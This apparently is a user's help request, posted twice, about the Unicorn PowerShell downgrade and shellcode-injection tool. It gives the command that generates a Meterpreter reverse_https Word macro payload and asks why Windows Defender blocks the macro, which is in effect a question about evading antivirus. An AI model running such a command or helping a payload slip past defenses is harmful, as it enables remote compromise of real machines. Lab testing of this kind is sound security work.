Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Thank you for putting the time and effort into making this powerful tool. I just tried this out today with a Kali VM and a Windows 10 VM. The Windows VM has full Windows Defender options on.
On the Kali VM, I ran:
python3 unicorn.py windows/meterpreter/reverse_https 8080 macro
Then, I
cat powershell_attack.txt
and pasted the output (having replaced Auto_Open with AutoOpen) to my Windows VM word macro.
As soon as I hit Ctrl+S, the machine warns of the virus and prevents the macro from being saved.
I don't really know what could be the causes for the problem. Any help would be appreciated. Thank you in advance!
Thank you for putting the time and effort into making this powerful tool. I just tried this out today with a Kali VM and a Windows 10 VM. The Windows VM has full Windows Defender options on.
On the Kali VM, I ran: python3 unicorn.py windows/meterpreter/reverse_https 8080 macro
Then, I cat powershell_attack.txt and pasted the output (having replaced Auto_Open with AutoOpen) to my Windows VM word macro.
As soon as I hit Ctrl+S, the machine warns of the virus and prevents the macro from being saved.
I don't really know what could be the causes for the problem. Any help would be appreciated. Thank you in advance!